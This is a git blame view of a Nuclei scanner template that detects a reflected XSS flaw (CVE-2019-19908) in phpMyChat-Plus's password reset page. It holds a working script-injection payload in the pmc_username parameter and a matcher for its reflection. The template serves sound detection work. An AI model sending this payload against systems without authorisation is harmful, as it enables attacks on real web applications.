daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2019/CVE-2019-19908.yaml

24 lines
702 B
YAML
Raw Normal View History

misc changes
2021-01-02 04:59:06 +00:00
id: CVE-2019-19908
Create CVE-2019-19908.yaml
2020-04-08 13:04:46 +00:00
info:
name: phpMyChat-Plus XSS
author: madrobot
Update syntax
2020-05-25 07:49:06 +00:00
severity: medium
Description and referenes
2021-03-30 12:10:17 +00:00
description: phpMyChat-Plus 1.98 is vulnerable to reflected XSS via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable.
reference: https://cinzinga.github.io/CVE-2019-19908/
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses:
2021-02-05 19:44:41 +00:00
tags: cve,cve2019,xss
Create CVE-2019-19908.yaml
2020-04-08 13:04:46 +00:00
requests:
- method: GET
path:
updating temp
2020-04-09 20:21:15 +00:00
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
Fixed default condition OR to AND in false-positives
2020-07-08 11:38:57 +00:00
matchers-condition: and
Create CVE-2019-19908.yaml
2020-04-08 13:04:46 +00:00
matchers:
- type: status
status:
Update syntax
2020-05-25 07:49:06 +00:00
- 200
Update CVE-2019-19908.yaml
2020-04-08 13:20:50 +00:00
- type: word
Update CVE-2019-19908.yaml
2020-04-08 13:24:57 +00:00
words:
Update syntax
2020-05-25 07:49:06 +00:00
- "<script>alert(1337)</script>"
Create CVE-2019-19908.yaml
2020-04-08 13:04:46 +00:00
part: body